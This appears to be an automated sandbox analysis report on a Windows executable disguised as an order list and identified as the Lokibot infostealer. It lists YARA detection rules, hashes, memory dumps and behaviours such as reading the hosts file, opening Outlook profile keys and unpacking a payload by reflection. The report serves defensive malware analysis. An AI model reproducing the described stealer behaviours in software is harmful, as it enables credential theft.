Source: 0.2.ORDER LIST790.exe.373cd94.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.ORDER LIST790.exe.373cd94.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.ORDER LIST790.exe.373cd94.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.ORDER LIST790.exe.373cd94.3.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.ORDER LIST790.exe.373cd94.3.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.ORDER LIST790.exe.3730b48.1.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 0.2.ORDER LIST790.exe.3730b48.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.ORDER LIST790.exe.3730b48.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.ORDER LIST790.exe.3730b48.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.ORDER LIST790.exe.3730b48.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.ORDER LIST790.exe.3730b48.1.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.275714914.0000000004726000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.275714914.0000000004726000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.275714914.0000000004726000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000000.268461848.0000000000415000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000004.00000000.268189869.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.275655119.0000000004709000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.275655119.0000000004709000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.275655119.0000000004709000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: ORDER LIST790.exe PID: 980, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: ORDER LIST790.exe PID: 1672, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23

Source: C:\Users\user\Desktop\ORDER LIST790.exe	Code function: 0_2_018EC214	0_2_018EC214
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Code function: 0_2_018EEBA8	0_2_018EEBA8
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Code function: 0_2_018EEBB8	0_2_018EEBB8

Source: ORDER LIST790.exe, 00000000.00000002.278553985.0000000007D20000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameKeysNormalize.dll4 vs ORDER LIST790.exe
Source: ORDER LIST790.exe, 00000000.00000002.278832560.0000000007E70000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameWebName.dll4 vs ORDER LIST790.exe
Source: ORDER LIST790.exe, 00000000.00000002.278857766.0000000007F90000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameDoncepre.dll@ vs ORDER LIST790.exe
Source: ORDER LIST790.exe, 00000000.00000002.273358905.0000000003535000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWebName.dll4 vs ORDER LIST790.exe
Source: ORDER LIST790.exe, 00000000.00000002.274422627.0000000004451000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameKeysNormalize.dll4 vs ORDER LIST790.exe
Source: ORDER LIST790.exe, 00000000.00000002.274422627.0000000004451000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameDoncepre.dll@ vs ORDER LIST790.exe
Source: ORDER LIST790.exe, 00000000.00000003.260912699.0000000007C21000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameKeysNormalize.dll4 vs ORDER LIST790.exe
Source: ORDER LIST790.exe, 00000000.00000000.235829681.0000000000F86000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameParallelLoopSt.exe. vs ORDER LIST790.exe
Source: ORDER LIST790.exe, 00000000.00000002.271014354.0000000001650000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs ORDER LIST790.exe
Source: ORDER LIST790.exe	Binary or memory string: OriginalFilenameParallelLoopSt.exe. vs ORDER LIST790.exe

Source: ORDER LIST790.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\ORDER LIST790.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\ORDER LIST790.exe "C:\Users\user\Desktop\ORDER LIST790.exe"
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process created: C:\Users\user\Desktop\ORDER LIST790.exe C:\Users\user\Desktop\ORDER LIST790.exe
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process created: C:\Users\user\Desktop\ORDER LIST790.exe C:\Users\user\Desktop\ORDER LIST790.exe	Jump to behavior

Source: C:\Users\user\Desktop\ORDER LIST790.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ORDER LIST790.exe.log

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/3@0/1

Source: ORDER LIST790.exe	Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior

Source: C:\Users\user\Desktop\ORDER LIST790.exe

Mutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430

Source: ORDER LIST790.exe, Main.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 0.0.ORDER LIST790.exe.eb0000.0.unpack, Main.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'

Source: C:\Users\user\Desktop\ORDER LIST790.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Users\user\Desktop\ORDER LIST790.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\ORDER LIST790.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Jump to behavior

Source: ORDER LIST790.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: ORDER LIST790.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Yara detected aPLib compressed binary

Source: Yara match	File source: 0.2.ORDER LIST790.exe.4726268.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ORDER LIST790.exe.470c248.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ORDER LIST790.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ORDER LIST790.exe.470c248.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ORDER LIST790.exe.4726268.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ORDER LIST790.exe.37298fc.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ORDER LIST790.exe.373cd94.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ORDER LIST790.exe.3730b48.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.275714914.0000000004726000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.268461848.0000000000415000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.275655119.0000000004709000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ORDER LIST790.exe PID: 980, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ORDER LIST790.exe PID: 1672, type: MEMORYSTR

.NET source code contains potential unpacker

Source: ORDER LIST790.exe, Main.cs	.Net Code: SafeHandle System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.ORDER LIST790.exe.eb0000.0.unpack, Main.cs	.Net Code: SafeHandle System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Users\user\Desktop\ORDER LIST790.exe

Code function: 0_2_05865CF8 push eax; mov dword ptr [esp], ecx

0_2_05865CFC

Source: initial sample

Static PE information: section name: .text entropy: 7.320980599570163

Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
